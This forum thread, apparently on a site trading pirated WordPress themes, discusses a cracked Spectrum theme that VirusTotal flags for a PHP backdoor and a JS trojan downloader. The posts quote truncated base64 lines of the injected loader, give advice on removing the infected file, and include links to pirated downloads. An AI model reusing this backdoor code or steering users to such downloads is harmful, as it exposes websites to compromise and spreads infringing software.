[Help] Spectrum 2.0.7 Multi-Trade Construction Business Theme (PHP.BackDoor.62 ware)

***Saunders412*** · (This post was last modified: 12-02-2016 07:39 AM by Saunders412.)

[Image: 01_MainPreview.__large_preview.jpg]

SALES: https://themeforest.net/item/spectrum-mu...e/10259946

DOWNLOAD: http://www107.zippyshare.com/v/eU1vBrke/file.html

https://virustotal.com/en/file/4ca6b64fb.../analysis/
File name: wp_spectrum.zip
Detection ratio: 2 / 52
Analysis date: 2016-12-01 19:23:49 UTC ( 2 hours, 1 minute ago )

VIRUS FOUND
DrWeb PHP.BackDoor.62 20161201
Jiangmin TrojanDownloader.JS.awni 20161201

Narrowed to this infected file
spectrum v2.0.7\spectrum\wp_spectrum_2.0.7\admin\ReduxCore\framework-functions.php

Is there anyone that might be able to help me clean this file up and remove the maleware so that this theme works? This is a really good theme.

This doesn't look right, but not sure exactly what to remove in the framework-functions.php file..

(Line 9) $GLOBALS['WP_CD_CODE'] = 'PD9waHANCg0KLy9pbnN0YWxsX2NvZ........
(Line 86) $install_code = 'PD9waHAKCmlmIChpc3NldCgkX1JFUVVFU1RbJ2FjdGlvbiddKSAmJiBpc3NldCgkX1JFUVVFU1RbJ3Bhc3N3b3JkJ10pICYmICgkX1JFUVVFU1RbJ3Bhc3N3b3JkJ10gPT0gJ3skUEFTU1dPUkR9JykpCgl7CgkJc3dpdGNoICgkX1JFUVVFU1RbJ2FjdGlvbiddKQoJCQl7CgkJCQljYXNlICdnZXRfYWxsX2xpbmtzJzsKCQkJCQlmb3JlYWNoICgkd3BkYi0

(When I remove these 2 lines and run it through Virustotal, TrojanDownloader.JS.awni is no longer found. But I still get the PHP.Backdoor.62

I have read somewhere that this could be related to base64_decode but not sure.

[/i]Would really appreciate if anyone could help me. I would totally send you reps...[/i]

***scriptos888*** · 12-02-2016, 06:55 PM

https://www.virustotal.com/en/file/b27cf.../analysis/

2 virus

***Saunders412*** · 12-02-2016, 10:13 PM

(12-02-2016 06:55 PM)scriptos888 Wrote: https://www.virustotal.com/en/file/b27cf.../analysis/

2 virus

Yes, I am aware of the 2 viruses. If you read my comment above, this is already outlined. Are you able to help?

***bale*** · 12-03-2016, 01:54 AM

That file is not part of the theme. Looks like dlwordpress.com inserted malware. Stay away from that site. Everything has been tampered with.
First thing remove that file. Also remove line 26 from admin/index.php

That should address your problem, but from the looks of it, better not use it. If you already ran the install than your wordpress is pretty much fu cked. Remove everything!

***Saunders412*** · 12-03-2016, 05:09 AM

(12-03-2016 01:54 AM)bale Wrote: That file is not part of the theme. Looks like dlwordpress.com inserted malware. Stay away from that site. Everything has been tampered with.
First thing remove that file. Also remove line 26 from admin/index.php

That should address your problem, but from the looks of it, better not use it. If you already ran the install than your wordpress is pretty much fu cked. Remove everything!

Thanks for the information and the tips. I am just going to use an older version. I was testing this in my wamp environment and not planning on using this since it seems that that there could be other files that might be tampered.

Thanks again for your help.

***syseng*** · 12-03-2016, 04:39 PM

Code:

v2.0.6

Code:

https://>>>[[[Reported by Members as Site with too Many annoying Pop Ups Ads/ ADWARE ]]]<<</14g2wokw6vpf

***Saunders412*** · 12-03-2016, 11:05 PM

(12-03-2016 04:39 PM)syseng Wrote:

Code:

v2.0.6

Code:

https://>>>[[[Reported by Members as Site with too Many annoying Pop Ups Ads/ ADWARE ]]]<<</14g2wokw6vpf

Thanks for posting, do you know where you downloaded this file from? The file looks a little dirty. Any ideas? I am going to use your post and compare it with 2.0.7.

https://www.virustotal.com/en/file/34978...480770039/

Jiangmin TrojanDownloader.JS.awni 20161203
ALYac 20161203